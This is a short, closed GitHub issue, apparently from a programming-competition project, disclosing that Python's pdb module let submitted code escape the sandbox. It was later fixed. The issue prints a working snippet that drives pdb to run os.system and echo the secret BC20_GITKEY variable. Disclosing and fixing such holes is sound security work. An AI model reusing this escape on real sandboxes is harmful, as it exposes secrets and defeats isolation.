Closed arvid220u closed 4 years ago
It opens up the following exploit:
import pdb from pdb import Pdb class Hi: def write(self, x): pass def flush(self): pass def readline(self): return "c\n" mypdb = pdb.Pdb(stdout = Hi(), stdin=Hi(), nosigint=True) mypdb.run("import os") mypdb.run("os.system(\"echo $BC20_GITKEY\")")
The fact that pdb might be a vulnerability was reported by a user who would like to remain anonymous.
fixed in #117
arvid220u
commented
4 years ago arvid220u
commented
4 years ago
It opens up the following exploit:
The fact that pdb might be a vulnerability was reported by a user who would like to remain anonymous.